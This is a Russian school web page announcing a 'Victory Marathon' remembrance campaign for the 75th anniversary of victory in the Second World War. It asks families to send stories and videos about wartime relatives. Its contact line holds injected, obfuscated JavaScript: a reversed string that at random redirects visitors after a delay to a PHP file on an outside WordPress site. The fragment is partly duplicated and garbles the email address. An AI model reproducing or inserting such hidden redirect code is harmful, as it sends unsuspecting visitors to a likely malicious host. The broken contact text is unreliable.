logo

Акция «Марафон Победы»

Дорогие друзья!

Кафедра гуманитарных наук приглашает вас принять участие в акции «Марафон Победы», в ходе которой мы будем рассказывать о наших предках, героях Великой Отечественной войны, вспоминать военные песни, стихи, очерки и рассказы.

В далеком 1941 году война вошла в каждый дом и навсегда изменила жизни миллионов людей. Сегодня мы не можем повернуть время вспять и вырвать страшные страницы из истории нашей страны. Но мы можем всегда помнить имена людей, которым пришлось заплатить высокую цену за Победу, и пронести память о них сквозь поколения.

Вместе с вами мы будем вспоминать тех, кто сражался на фронте, спасал жизни раненых в госпиталях, трудился для победы в тылу, выезжал на передовую, чтобы запечатлеть историю войны, или выступал в составе концертных бригад, чтобы поднять дух бойцов, а также тех, кто был лишен детства и помогал взрослым, чем мог.

В каждой семье есть свой герой!

 

Все дальше и дальше уходит от нас война. В этом году наша страна празднует 75-ю годовщину Великой Победы! В период с 20 апреля по 9 мая предлагаем вам присоединиться к акции «Марафон Победы» и рассказать историю героев вашей семьи. Мы также предлагаем детям и родителям записать видео с исполнением песни, стихотворения или отрывка прозы о войне.

Будем помнить и чтить наших героев!

Материалы просим высылать Сусловой Татьяне Викторовне, заведующей кафедры гуманитарных дисциплин, учителю истории на английском языке в DP – $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:suslova@integration21.ru»>suslova@integration21.ru

 

С Великом Праздником вас, друзья!